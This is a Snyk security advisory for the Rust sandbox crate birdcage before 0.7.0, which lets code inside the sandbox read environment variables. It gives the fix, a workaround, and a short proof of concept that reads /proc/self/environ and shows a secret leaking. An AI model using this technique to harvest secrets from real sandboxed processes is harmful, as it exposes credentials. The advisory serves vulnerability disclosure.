Information Exposure Affecting birdcage package, versions <0.7.0
Threat Intelligence
Exploit Maturity
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Proof of concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-RUST-BIRDCAGE-6097153
- published3 Dec 2023
- disclosed1 Dec 2023
- creditUnknown
Introduced: 1 Dec 2023
CVE NOT AVAILABLE CWE-200 (opens in a new tab)Common Weakness Enumeration (CWE) is a category system for software weaknesses
How to fix?
Upgrade birdcage to version 0.7.0 or higher.
Overview
Affected versions of this package are vulnerable to Information Exposure. An attacker can read environment variables from procfs unless a new process is started.
Workaround
This vulnerability can be mitigated by relying on the ptrace isolation and always spawning a new process by changing birdcage's API to create a new command. With an additional PID namespace, the guarantees could be even further reinforced.
PoC
use birdcage::{Birdcage, Sandbox};
use std::{env, fs};
fn main() {
Birdcage::new().lock().unwrap();
assert_eq!(env::var_os("SECRET"), None);
let environ = fs::read_to_string("/proc/self/environ").unwrap();
assert!(!environ.contains("SECRET"), "ENVIRON CONTAINS SECRET:\n{environ}");
}
$ SECRET=test cargo run
thread 'main' panicked at src/main.rs:10:5:
ENVIRON CONTAINS SECRET:
[truncated]
References
CVSS Scores
version 3.1